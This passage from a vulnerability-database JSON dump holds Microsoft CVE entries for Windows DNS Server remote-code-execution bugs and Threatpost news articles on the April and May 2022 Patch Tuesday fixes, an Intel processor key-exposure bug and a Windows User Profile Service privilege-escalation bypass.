"accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-12T08:00:00", "id": "MS:CVE-2022-26812", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26812", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:45:23", 
"description": "Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mscve", "title": "Windows DNS Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-12T08:00:00", "id": "MS:CVE-2022-26811", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26811", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:45:20", 
"description": "Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mscve", "title": "Windows DNS Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-12T08:00:00", "id": "MS:CVE-2022-24536", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-24536", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:45:18", 
"description": "Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mscve", "title": "Windows DNS Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-12T08:00:00", "id": "MS:CVE-2022-26815", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26815", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:45:23", 
"description": "Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mscve", "title": "Windows DNS Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-12T08:00:00", "id": "MS:CVE-2022-26813", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26813", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": 
"2022-04-19T21:01:27", "description": "Microsoft has released patches for 128 security vulnerabilities for its April 2022 [monthly scheduled update](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Apr>) \u2013 ten of them rated critical (including three wormable code-execution bugs that require no user interaction to exploit).\n\nThere are also two important-rated zero-days that allow privilege escalation, including one listed as under active exploit.\n\nThe bugs in the update are found across the portfolio, including in Microsoft Windows and Windows Components, Microsoft Defender and Defender for Endpoint, Microsoft Dynamics, Microsoft Edge (Chromium-based), Exchange Server, Office and Office Components, SharePoint Server, Windows Hyper-V, DNS Server, Skype for Business, .NET and Visual Studio, Windows App Store and Windows Print Spooler Components.\n\n\u201cThis large volume of patches hasn\u2019t been seen since the fall of 2020. However, this level is similar to what we saw in the first quarter of last year,\u201d Dustin Childs, researcher at Trend Micro\u2019s Zero Day Initiative, said in [a blog](<https://www.zerodayinitiative.com/blog/2022/4/11/the-april-2022-security-update-review>) breaking down the fixes.\n\n## **Zero-Day Patches**\n\nThe vulnerability that\u2019s been exploited in the wild ahead of patching allows privilege escalation, and is tracked as [CVE-2022-24521](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24521>). It rates 7.8 out of 10 on the CVSS vulnerability-severity scale. It\u2019s listed as a \u201cWindows Common Log File System Driver Execution Vulnerability,\u201d and was reported to Microsoft by the National Security Agency.\n\n\u201cIt\u2019s not stated how widely the exploit is being used in the wild, but it\u2019s likely still targeted at this point and not broadly available,\u201d Childs noted. 
\u201cGo patch your systems before that situation changes.\u201d\n\nResearchers noted that attackers are likely pairing it with a separate code-execution bug in their campaigns. For that reason, Immersive Labs\u2019 Kevin Breen, director of cyber-threat research, places the actively exploited bug at the top of the priority list for patching.\n\n\u201cBeing the type of vulnerability for escalating privileges, this would indicate a threat actor is currently using it to aid lateral movement to capitalize on a pre-existing foothold,\u201d he explained.\n\nThe second zero-day is found in the Windows User Profile Service, and is tracked as [CVE-2022-26904](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26904>).\n\nIt also allows privilege escalation, and rates a CVSS score of 7. Even though it\u2019s listed as exploitation more likely, it has a high attack complexity, Microsoft noted in its advisory, because \u201csuccessful exploitation of this vulnerability requires an attacker to win a race condition.\u201d\n\nEven so, researchers at Tripwire noted that exploit code is available for the bug, including in the [Metasploit framework](<https://threatpost.com/metasploit-still-a-menace/149448/>).\n\n## **Critical Concerns for April**\n\nOut of the critical flaws, all of which allow remote code-execution (RCE), researchers flagged a bug that could allow for self-propagating exploits ([CVE-2022-26809](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809>)) as being of the most concern.\n\nIt exists in the Remote Procedure Call (RPC) Runtime Library, and rates 9.8 out of 10 on the CVSS scale, with exploitation noted as more likely. 
If exploited, a remote attacker could execute code with high privileges.\n\nDanny Kim, principal architect at Virsec, noted that the vulnerability is specifically found in Microsoft\u2019s Server Message Block (SMB) functionality, which is used primarily for file-sharing and inter-process communication, including Remote Procedure Calls. RPC is a communication mechanism that allows for one program to request a service or functionality from another program located on the network (internet and/or intranet). RPCs can be used in technologies like storage replica or managing shared volumes.\n\n\u201cThis vulnerability is another example of an attacker taking advantage of legitimate functionality for malicious gain,\u201d he said via email. \u201cUsing the vulnerability, an attacker can create a specially crafted RPC to execute code on the remote server with the same permissions as the RPC service.\u201d\n\nThe bug could be used to create especially virulent threats, according to Childs.\n\n\u201cSince no user interaction is required, these factors combine to make this wormable, at least between machines where RPC can be reached,\u201d Childs noted.\n\nMicrosoft recommends configuring firewall rules to help prevent this vulnerability from being exploited; the static port used (TCP port 135) can be blocked at the network perimeter.\n\n\u201cStill, this bug could be used for lateral movement by an attacker,\u201d Childs warned. \u201cDefinitely test and deploy this one quickly.\u201d\n\nNext up are [CVE-2022-24491](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24491>)/[24497](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24497>), two RCE bugs that affect the Windows Network File System (NFS). Both also have CVSS scores of 9.8, and both are listed as exploitation more likely. 
They also allow the potential for worming exploits, Childs warned.\n\n\u201cOn systems where the NFS role is enabled, a remote attacker could execute their code on an affected system with high privileges and without user interaction,\u201d Childs explained. \u201cAgain, that adds up to a wormable bug \u2013 at least between NFS servers. Similar to RPC, this is often blocked at the network perimeter.\u201d\n\nImmersive\u2019s Breen added, \u201cThese could be the kind of vulnerabilities which appeal to ransomware operators as they provide the potential to expose critical data. It is also important for security teams to note that NFS Role is not a default configuration for Windows devices.\u201d\n\nThe remaining critical vulnerabilities are as follows:\n\n * [CVE-2022-23259](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-23259>): Microsoft Dynamics 365 (on-premises) (CVSS 8.8)\n * [CVE-2022-22008](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22008>): Windows Hyper-V (CVSS 7.7)\n * [CVE-2022-23257](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-23257>): Windows Hyper-V (CVSS 8.6)\n * [CVE-2022-24537](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24537>): Windows Hyper-V (CVSS 7.7)\n * [CVE-2022-26919](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26919>): Windows LDAP (CVSS 8.1)\n * [CVE-2022-24541](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24541>): Windows Server (CVSS 8.8)\n * [CVE-2022-24500](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24500>): Windows SMB (CVSS 8.8)\n\n## **Other Bugs of Note**\n\nAlso worth mentioning: Out of a whopping 18 bugs found in the Windows Domain Name Server (DNS), one ([CVE-2022-26815](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26815>)) allows RCE and is listed as important, with a CVSS score of 7.2.\n\nMicrosoft noted that while attack complexity is low, \u201cthe attacker or targeted 
user would need specific elevated privileges [for successful exploitation]. As is best practice, regular validation and audits of administrative groups should be conducted.\u201d\n\nMeanwhile, \u201cthere are a couple of important mitigations to point out here,\u201d Childs noted. \u201cThe first is that dynamic updates must be enabled for a server to be affected by this bug. The CVSS also lists some level of privileges to exploit. Still, any chance of an attacker getting RCE on a DNS server is one too many, so get your DNS servers patched.\u201d\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-12T20:00:54", "type": "threatpost", "title": "Microsoft Zero-Days, Wormable Bugs Spark Concern", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-22008", "CVE-2022-23257", "CVE-2022-23259", "CVE-2022-24491", "CVE-2022-24497", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24537", "CVE-2022-24541", "CVE-2022-26809", "CVE-2022-26815", "CVE-2022-26904", "CVE-2022-26919"], "modified": "2022-04-12T20:00:54", "id": "THREATPOST:C4B358E42FF02B710BE90F363212C84F", "href": "https://threatpost.com/microsoft-zero-days-wormable-bugs/179273/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-11T11:15:19", "description": "Microsoft has revealed 73 new patches for [May\u2019s monthly update of security fixes](<https://msrc.microsoft.com/update-guide/releaseNote/2022-May>), including a patch for one flaw\u2013a zero-day Windows LSA Spoofing Vulnerability rated as \u201cimportant\u201d\u2014that is currently being exploited with man-in-the-middle attacks.\n\nThe software giant\u2019s monthly update of patches that comes out every second Tuesday of the month\u2013known as Patch Tuesday\u2014also included fixes for seven \u201ccritical\u201d flaws, 65 others rated as \u201cimportant,\u201d and one rated as \u201clow.\u201d\n\n\u201cAlthough this isn\u2019t a large number, this month makes up for it in severity and infrastructure headaches,\u201d observed Chris Hass, director of security at security firm [Automox](<https://www.automox.com/>)_, _in an email to Threatpost. \u201cThe big news is the critical vulnerabilities that need to be highlighted for immediate action.\u201d\n\nOf the seven critical flaws, five allow for remote code execution (RCE) and two give attackers elevation of privilege (EoP). 
The remainder of the flaws also include a high percentage of RCE and EoP bugs, with the former accounting for 32.9 percent of the flaws patched this month, while the latter accounted for 28.8 percent of fixes, according to [a blog post](<https://www.tenable.com/blog/microsofts-may-2022-patch-tuesday-addresses-73-cves-cve-2022-26925>) by researchers at Tenable.\n\nThe Windows LSA Spoofing Vulnerability, tracked as [CVE-2022-26925](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26925>), in and of itself was not rated as critical. However, when chained with a new technology LAN manager (NTLM) relay attack, the combined CVSSv3 score for the attack chain is 9.8, noted Allan Liska, a senior security architect at Recorded Future, in an e-mail to Threatpost.\n\nMoreover, the flaw\u2014which allows an unauthenticated attacker to coerce domain controllers to authenticate to an attacker-controller server using NTLM\u2013is being exploited in the wild as a zero-day, he said. This makes it a priority to patch, Liska added, echoing guidance from Microsoft.\n\n## **Critical Infrastructure Vulnerabilities **\n\nOf the other critical RCE flaws patched by Microsoft, four are worth noting because of their presence in infrastructure that\u2019s fairly ubiquitous in many enterprise and/or cloud environments.\n\nOne is tracked as [CVE-2022-29972](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-29972>) and is found in Insight Software\u2019s Magnitude Simba Amazon Redshift ODBC Driver, and would need to be patched by a cloud provider\u2014something organizations should follow up on, Liska said.\n\n[CVE-2022-22012](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-22012>) and [CVE-2022-29130](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-29130>) are RCE vulnerabilities found in Microsoft\u2019s LDAP service that are rated as critical. 
However, a caveat by Microsoft in its security bulletin noted that they are only exploitable \u201cif the MaxReceiveBuffer LDAP policy is set to a value higher than the default value.\u201d That means that systems with the default value of this policy would not be vulnerable, the company said.\n\nWhile \u201chaving the MaxReceiveBuffer set to a higher value than the default\u201d seems an \u201cuncommon configuration,\u201d if an organization has this setting, it should prioritize patching these vulnerabilities, Liska observed.\n\nAnother critical RCE, [CVE-2022-26937](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26937>), is found in the Network File System (NFS) and has broad impact for Windows Server versions 2008 through 2022. However, this vulnerability only affects NFSV2 and NFSV3, and Microsoft has included instructions for disabling these [versions of the NFS in the bulletin](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26937>).\n\nAt the same time, Microsoft characterized the ease of exploitation of these vulnerabilities as \u201cExploitation More Likely,\u201d as was the case with a similar vulnerability, [CVE-2021-26432](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26432>), an actively exploited zero day in the TCP/IP protocol stack in Windows server that [was patched](<https://threatpost.com/exploited-windows-zero-day-patch/168539/>) in August 2021.\n\n\u201cGiven the similarities between these vulnerabilities and those of August of 2021, we could all be in store for a rough May,\u201d Liska noted.\n\n## **Another Important Flaw Fixed**\n\nOf the other flaws, another \u201cimportant\u201d one to note is [CVE-2022-22019](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-22019>), a companion vulnerability to three previously disclosed and patched flaws found in Microsoft\u2019s Remote Procedure Call (RPC) runtime library.\n\nThe vulnerability, discovered by Akamai researcher Ben 
Barnea, takes advantage of three RPC runtime library flaws that Microsoft had patched in April\u2013[CVE-2022-26809](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26809>), [CVE-2022-24492](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24492>) and [CVE-2022-24528](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24528>), he revealed in [a blog post Tuesday](<https://www.akamai.com/blog/security/rpc-runtime-patch-tuesday-take-two>). The flaws affected Windows 7, 8, 10 and 11, and Windows Servers 2008, 2012, 2019 and 2022, and could allow a remote, unauthenticated attacker to execute code on the vulnerable machine with the privileges of the RPC service.\n\nAkamai researchers discovered that the previous patch only partially addressed the problem, allowing the new vulnerability to create the same integer overflow that was supposed to be fixed, he explained.\n\n\u201cDuring our research, we found that right before allocating memory for the new coalesced buffer, the code adds another 24 bytes to the allocation size,\u201d Barnea wrote in the post. 
\u201cThese 24 bytes are the size of a struct called \u2018rpcconn_request_hdr_t,\u2019 which serves as the buffer header.\u201d\n\nThe previous patch performs the check for integer overflow before adding the header size, so it does not take into account this header\u2013which can lead to the same integer overflow that the patch was attempting to mitigate, he explained.\n\n\u201cThe new patch adds another call to validate that the addition of 24 bytes does not overflow,\u201d mitigating the problem, Barnea wrote.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-11T11:12:11", "type": "threatpost", "title": "Actively Exploited Zero-Day Bug Patched by Microsoft", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26432", "CVE-2022-22012", "CVE-2022-22019", "CVE-2022-24492", "CVE-2022-24528", "CVE-2022-26809", "CVE-2022-26925", "CVE-2022-26937", "CVE-2022-29130", "CVE-2022-29972"], "modified": "2022-05-11T11:12:11", "id": "THREATPOST:B7A9B20B1E9413BB675D8C2810F1365F", "href": "https://threatpost.com/microsoft-zero-day-mays-patch-tuesday/179579/", "cvss": {"score": 10.0, "vector": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-15T21:22:00", "description": "A security vulnerability in Intel chips opens the door for encrypted file access and espionage, plus the ability to bypass copyright protection for digital content.\n\nThat\u2019s according to Positive Technologies (PT), which found that the vulnerability (CVE-2021-0146) is a debugging functionality with excessive privileges, which is not protected as it should be.\n\nThe high-severity privilege-escalation issue is rated 7.1 out of 10 on the CVSS vulnerability-severity scale.\n\n[](<https://threatpost.com/webinars/multi-cloud-security-and-visibility-an-intro-to-osquery-and-cloudquery/?utm_source=uptycs&utm_medium=email&utm_campaign=event&utm_id=uptycs&utm_term=nov_event&utm_content=IA>)\n\nRegister now for our LIVE event!\n\n\u201c[The] hardware allows activation of test or debug logic at runtime for some Intel processors which may allow an unauthenticated user to potentially enable escalation of privilege via physical access,\u201d according to Intel\u2019s advisory, [issued last week](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00528.html>).\n\nIn terms of scope, the vulnerability affects the Pentium, Celeron and Atom processors of the Apollo Lake, Gemini Lake and Gemini Lake Refresh platforms. 
These chips power laptops, mobile devices, embedded systems, medical devices and a variety of internet of things (IoT) offerings.\n\n\u201cAccording to a study by Mordor Intelligence, Intel ranks fourth in the IoT chip market, while its Intel Atom E3900 series IoT processors, which also contain the CVE-2021-0146 vulnerability, are used by car manufacturers in more than 30 models, including, according to unofficial sources, in Tesla\u2019s Model 3,\u201d PT noted in a writeup shared with Threatpost.\n\nTo address the issue, users should install the [UEFI BIOS](<https://threatpost.com/intel-security-holes-cpus-bluetooth-security/166747/>) updates published by manufacturers of each piece of electronic equipment. The following processor models are affected:\n\n\n\nSource: Intel.\n\n## **CVE-2021-0146 Impact for End Users**\n\nWhen it comes to impact, an exploit would allow cybercriminals to extract a device\u2019s encryption key and gain access to information.\n\n\u201cOne example of a real threat is lost or stolen laptops that contain confidential information in encrypted form,\u201d said Mark Ermolov, a PT researcher who was credited with discovering the bug (along with PT\u2019s Dmitry Sklyarov and independent researcher Maxim Goryachy).\n\nThe vulnerability is also dangerous because it facilitates the extraction of the root encryption key used in Intel\u2019s Platform Trust Technology and Enhanced Privacy ID technologies, which are used to protect digital content from illegal copying, Ermolov added\n\n\u201cFor example, a number of Amazon e-book models use Intel EPID-based protection for digital rights management,\u201d he explained. 
\u201cUsing this vulnerability, an intruder might extract the root EPID key from a device (e-book), and then, having compromised Intel EPID technology, download electronic materials from providers in file form, copy and distribute them.\u201d\n\nAdditionally, an exploit could allow cyberattackers to conduct targeted attacks across the supply chain, Ermolov noted.\n\n\u201cFor example, an employee of an Intel processor-based device supplier could extract the Intel CSME firmware key and deploy spyware that security software would not detect,\u201d he said.\n\n**_Want to win back control of the flimsy passwords standing between your network and the next cyberattack? Join Darren James, head of internal IT at Specops, and Roger Grimes, data-driven defense evangelist at KnowBe4, to find out how during a free, LIVE Threatpost event, _**[**_\u201cPassword Reset: Claiming Control of Credentials to Stop Attacks,\u201d_**](<https://bit.ly/3bBMX30>) **_on Wed., Nov. 17 at 2 p.m. ET. Sponsored by Specops._**\n\n[**_Register NOW_**](<https://bit.ly/3bBMX30>)_** for the LIVE event!**_\n", "cvss3": {}, "published": "2021-11-15T20:52:27", "type": "threatpost", "title": "High-Severity Intel Processor Bug Exposes Encryption Keys", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-0146", "CVE-2021-34484"], "modified": "2021-11-15T20:52:27", "id": "THREATPOST:53A062956C31459E2846CD4C959DFD49", "href": "https://threatpost.com/intel-processor-bug-encryption-keys/176355/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-15T21:22:03", "description": "A partially unpatched security bug in Windows that could allow local privilege escalation from a regular user to System remains unaddressed fully by Microsoft \u2013 but an unofficial micropatch from oPatch has hit the scene.\n\nThe bug ([CVE-2021-34484](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34484>)) was originally disclosed and patched as part of Microsoft\u2019s 
[August Patch Tuesday updates](<https://threatpost.com/exploited-windows-zero-day-patch/168539/>). At the time, it was categorized as an arbitrary directory-deletion issue that was considered low-priority because an attacker would need to locally log into the targeted computer to exploit it, which, in theory, would allow the adversary to delete file folders anyway.\n\nHowever, the security researcher who discovered it, Abdelhamid Naceri, [soon uncovered](<https://halove23.blogspot.com/2021/10/windows-user-profile-service-0day.html>) that it could also be used for privilege escalation, which is a whole other ball of wax. System-level users have access to resources, databases and servers on other parts of the network.\n\nAbdelhamid also took a look at Microsoft\u2019s original patch, subsequently finding a bypass for it via a simple tweak to the exploit code he had developed, essentially reverting it to zero-day status.\n\n> CVE-2021-34484 bypass as 0day<https://t.co/W0gnYHxJ6B>\n> \n> \u2014 Abdelhamid Naceri (@KLINIX5) [October 22, 2021](<https://twitter.com/KLINIX5/status/1451558296872173577?ref_src=twsrc%5Etfw>)\n\n\u201cThe vulnerability lies in the User Profile Service, specifically in the code responsible for 